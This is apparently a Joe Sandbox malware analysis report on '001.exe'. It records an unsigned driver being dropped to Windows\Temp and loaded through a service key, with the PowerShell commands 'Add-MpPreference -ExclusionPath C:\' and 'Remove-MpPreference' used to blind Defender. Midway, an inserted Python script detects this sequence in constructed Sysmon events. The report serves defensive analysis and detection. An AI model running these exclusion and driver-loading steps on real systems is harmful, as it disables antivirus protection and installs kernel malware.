Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097E3D5
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0091F314
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0094A32A
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008BA358
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0099F377
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008594A4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B84BC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009534AD
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009404AC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0099D4DD
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009214F1
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0094F4FA
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0089E4F8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0086B4FC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00841400
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0088F458
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009B544E
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009B747D
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0095047E
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009555BB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009655AE
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B35B0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009665AD
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009AC5C7
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008845E0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009565FB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008635F4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009B55E2
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097752C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0091C548
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009BE544
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00888570
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009296B1
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B26A0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008BC6A0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A46B4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009AE6CB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009616FA
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009786E4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0092F6ED
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00976606
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0092B628
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009BA676
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0092966A
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0089178C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008927B4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0091E713
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0087876C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008668C4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0093B8DE
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0095C8DB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008418EC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008AD80C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B2820
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A7834
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A284C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B6878
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0086F870
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B9870
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B3984
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009889CB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00921918
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0094D90D
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00867918
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00881940
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00989AAB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00855AB0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00883AB0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00876ABC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00881AF8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00922AEB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B0AF4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00931A11
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B5A58
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00939A44
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A7A50
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00878A64
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0084BA60
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0098BA76
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B1A74
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00932B91
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0091FBB0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00955BB7
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097FBB3
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00933BF1
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00849BF4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00949B2E
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008BDB30
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0094FB5C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008ADCAC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A7CB8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B8CBC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009A5CDB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00892CC8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00891CF0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0089AC08
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009A4C3C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00974C58
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A8C78
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00875D84
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B7D80
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0084ED88
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00994D8E
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009BDDBB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009B7D0B
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00957D01
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0095CD5D
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0092DD7E
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00844E80
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00872EAC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0094BED0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00977EC7
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00966EC4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008A2EDC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00971ECB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00848EE4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008ACEF4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097DE1F
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00940E66
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008BCF9C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00967FDD
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B9FF4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0085EF08
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00930F3C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00861F50
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00856F58
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0094CF65
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\1Qkj6qa_7944.sys C37BF1ABC0662B4F18607E2D7B75F5C600E45EA5604DAFFA54674E2AEBDCE9F0
Source: C:\Users\user\Desktop\001.exe | Process token adjusted: Load Driver
Source: C:\Users\user\Desktop\001.exe | Code function: String function: 0085B600 appears 69 times
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFlvideo.sys0 vs 001.exe
Source: 001.exe, 00000001.00000002.1779540899.000000014042F000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilenameFONTVIEW.EXEj% vs 001.exe
Source: 001.exe | Binary or memory string: OriginalFilenameFONTVIEW.EXEj% vs 001.exe
Source: C:\Users\user\Desktop\001.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\nKxb3J_7944
Source: 1Qkj6qa_7944.sys.1.dr | Binary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
Source: classification engine | Classification label: mal88.evad.winEXE@7/11@0/2
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00845D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008BF038 AdjustTokenPrivileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Users\user\Desktop\001.exe | File created: C:\Windows\Temp\qhW7w34_7944.tmp
Source: C:\Users\user\Desktop\001.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 001.exe | Virustotal: Detection: 36%
Source: 001.exe | ReversingLabs: Detection: 33%
Source: unknown | Process created: C:\Users\user\Desktop\001.exe "C:\Users\user\Desktop\001.exe"
Source: C:\Users\user\Desktop\001.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\001.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
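Taken together, the host-side findings describe one sequence: 001.exe enables SeLoadDriverPrivilege, writes a service key (nKxb3J_7944) whose ImagePath points at a .sys it just dropped in C:\Windows\Temp, loads it with NtLoadDriver, deletes the file, and brackets the whole thing with "Add-MpPreference -ExclusionPath C:\" and a matching Remove-MpPreference so that Defender does not see the driver on disk. The following is an editor-added detection example, not part of the Joe Sandbox report. It runs over constructed Sysmon-style events (the event shapes follow Sysmon IDs 1, 6, 11, 13 and 23; the explorer.exe/cmd.exe parents, the "C:\Dev\build" exclusion and the list of writable directories are assumptions) and correlates the two behaviours into a single verdict.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events modelled on the report's process tree (not a
# real log). EventID 1 = process create, 6 = driver load, 11 = file create,
# 13 = registry value set, 23 = file delete.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\user\\Desktop\\001.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Users\\user\\Desktop\\001.exe\""},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Users\\user\\Desktop\\001.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPath C:\\"},
    {"EventID": 11, "Image": "C:\\Users\\user\\Desktop\\001.exe",
     "TargetFilename": "C:\\Windows\\Temp\\1Qkj6qa_7944.sys"},
    {"EventID": 13, "Image": "C:\\Users\\user\\Desktop\\001.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\nKxb3J_7944\\ImagePath",
     "Details": "\\??\\C:\\Windows\\Temp\\1Qkj6qa_7944.sys"},
    {"EventID": 6, "ImageLoaded": "C:\\Windows\\Temp\\1Qkj6qa_7944.sys", "Signed": "false"},
    {"EventID": 23, "Image": "C:\\Users\\user\\Desktop\\001.exe",
     "TargetFilename": "C:\\Windows\\Temp\\1Qkj6qa_7944.sys"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Users\\user\\Desktop\\001.exe",
     "CommandLine": "powershell Remove-MpPreference -ExclusionPath C:\\"},
    # Benign-looking control case: a narrow exclusion added from an interactive shell.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell Add-MpPreference -ExclusionPath C:\\Dev\\build"},
]

EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-ExclusionPath\s+(\"[^\"]*\"|'[^']*'|\S+)", re.IGNORECASE)
IMAGEPATH_RE = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
# Directories an unprivileged or freshly elevated process can write to; a kernel
# driver loaded from one of these deserves a look (assumed list, tune per estate).
WRITABLE_DIR_HINTS = ("\\windows\\temp\\", "\\users\\", "\\programdata\\", "\\temp\\")


def normalize_path(p):
    """Strip quotes and the NT \\??\\ prefix, lower-case for comparison."""
    p = p.strip().strip('"').strip("'")
    if p.startswith("\\??\\"):
        p = p[4:]
    return p.lower()


def is_broad_exclusion(path):
    """True when the excluded path is an entire drive such as C:\\."""
    p = PureWindowsPath(normalize_path(path))
    return bool(p.drive) and p == PureWindowsPath(p.anchor)


def defender_exclusion_findings(events):
    """Every Add-MpPreference -ExclusionPath in process-create events, flagged
    'broad' when it covers a whole drive. Plain command lines only: an
    -EncodedCommand variant needs decoding before this regex sees it."""
    out = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        m = EXCLUSION_RE.search(ev.get("CommandLine", ""))
        if m:
            path = normalize_path(m.group(1))
            out.append({"parent": ev.get("ParentImage"), "path": path,
                        "broad": is_broad_exclusion(path)})
    return out


def service_driver_findings(events):
    """Correlate Services\\<name>\\ImagePath writes with a later driver load of
    that image and a deletion of the file after the load."""
    loaded, deleted = {}, {}
    for i, ev in enumerate(events):
        if ev.get("EventID") == 6:
            loaded[normalize_path(ev["ImageLoaded"])] = (i, ev)
        elif ev.get("EventID") == 23:
            deleted.setdefault(normalize_path(ev["TargetFilename"]), i)
    out = []
    for ev in events:
        m = ev.get("EventID") == 13 and IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if not m:
            continue
        image = normalize_path(ev.get("Details", ""))
        load = loaded.get(image)
        out.append({
            "service": m.group(1), "image": image, "writer": ev.get("Image"),
            "writable_location": any(h in image for h in WRITABLE_DIR_HINTS),
            "loaded": load is not None,
            "unsigned": bool(load) and str(load[1].get("Signed", "")).lower() == "false",
            "deleted_after_load": bool(load) and deleted.get(image, -1) > load[0],
        })
    return out


def triage(events):
    """Combine both detections into one verdict with human-readable reasons."""
    exclusions = defender_exclusion_findings(events)
    drivers = service_driver_findings(events)
    reasons = [f"whole-drive Defender exclusion {x['path']} added by child of {x['parent']}"
               for x in exclusions if x["broad"]]
    for d in drivers:
        if d["loaded"] and (d["writable_location"] or d["unsigned"]):
            reasons.append(f"service {d['service']} loaded driver {d['image']}"
                           + (", file deleted after load" if d["deleted_after_load"] else ""))
    return {"suspicious": bool(reasons), "reasons": reasons,
            "exclusions": exclusions, "drivers": drivers}


if __name__ == "__main__":
    for reason in triage(SAMPLE_EVENTS)["reasons"]:
        print(reason)
```

The Remove-MpPreference that follows is what makes this worth correlating rather than alerting on each event alone: after it runs, a point-in-time check of Get-MpPreference shows nothing, and the driver file is already gone, so only the event trail (exclusion added, .sys written, ImagePath set, driver loaded, file deleted, exclusion removed) tells the story.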
Source: C:\Users\user\Desktop\001.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\001.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 001.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 001.exeStatic file information: File size 2034688 > 1048576
Source: 001.exeStatic PE information: Raw size of so2 is bigger than: 0x100000 < 0x1dc600
Source: Binary string: J.Pdby source: 001.exe
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085C634 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA, 1_2_0085C634
Source: initial sampleStatic PE information: section where entry point is pointing to: so2
Source: 001.exeStatic PE information: section name: so0
Source: 001.exeStatic PE information: section name: so1
Source: 001.exeStatic PE information: section name: so2
Source: 1Qkj6qa_7944.sys.1.drStatic PE information: section name: vs0
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF048 push 00000012h; ret 1_2_008BF053
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF050 push 00000012h; ret 1_2_008BF053
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF500 push rbp; ret 1_2_008BF502
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF540 push rcx; ret 1_2_008BF54A
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008C86F0 push rax; ret 1_2_008C8701
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008C8748 push rax; retn 008Ch 1_2_008C8759
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00842D40 push rcx; iretd 1_2_00842D43
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008C7E88 push rax; retn 008Ch 1_2_008C7E89
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D80D2A5 pushad ; iretd 2_2_00007FFC3D80D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D92BA7A push E85B10D7h; ret 2_2_00007FFC3D92BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D92BA3D push E85B10D7h; ret 2_2_00007FFC3D92BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D920982 push E85DE75Dh; ret 2_2_00007FFC3D9209F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D9209FA push E85DE75Dh; ret 2_2_00007FFC3D9209F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3D9200BD pushad ; iretd 2_2_00007FFC3D9200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3D90D2A5 pushad ; iretd 11_2_00007FFC3D90D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3DA219DB pushad ; ret 11_2_00007FFC3DA219E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3DA200BD pushad ; iretd 11_2_00007FFC3DA200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFC3DAF2316 push 8B485F93h; iretd 11_2_00007FFC3DAF231B
Source: 001.exeStatic PE information: section name: so2 entropy: 7.983182289557186
Source: 1Qkj6qa_7944.sys.1.drStatic PE information: section name: .text entropy: 7.126561604240753

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\001.exeFile created: C:\Windows\Temp\1Qkj6qa_7944.sys
Source: C:\Users\user\Desktop\001.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nKxb3J_7944

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
